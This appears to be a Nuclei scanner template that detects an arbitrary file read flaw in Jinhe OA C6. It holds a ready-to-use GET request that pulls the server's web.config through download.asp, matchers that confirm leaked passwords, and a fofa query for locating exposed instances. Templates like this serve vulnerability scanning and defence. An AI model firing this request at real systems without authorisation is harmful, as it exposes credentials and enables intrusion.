id: jinhe-oa-c6-lfi

info:
  name: Jinhe OA C6 download.jsp - Arbitary File Read
  author: SleepingBag945
  severity: high
  description: |
    There is an arbitrary file read vulnerability in Jinhe OA C6 download.jsp file, through which an attacker can obtain sensitive information in the server
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="金和网络-金和OA"
  tags: jinhe,lfi,misconfig

http:
  - method: GET
    path:
      - '{{BaseURL}}/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config'

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body,"<configuration>") && contains(body,"password=")'
          - 'contains(header,"filename=") && contains(header,"application/octet-stream")'
        condition: and
# digest: 4a0a0047304502206d37dcc7cb89dccc04b15d0daee21aad685feefcb93ae849e1c9c9fd138dc62502210081fc7979242482bf54e852f0e49ce84f59b90bc4ed79057fe83226b0d3e24cca:922c64590222798bb761d5b6d8e72950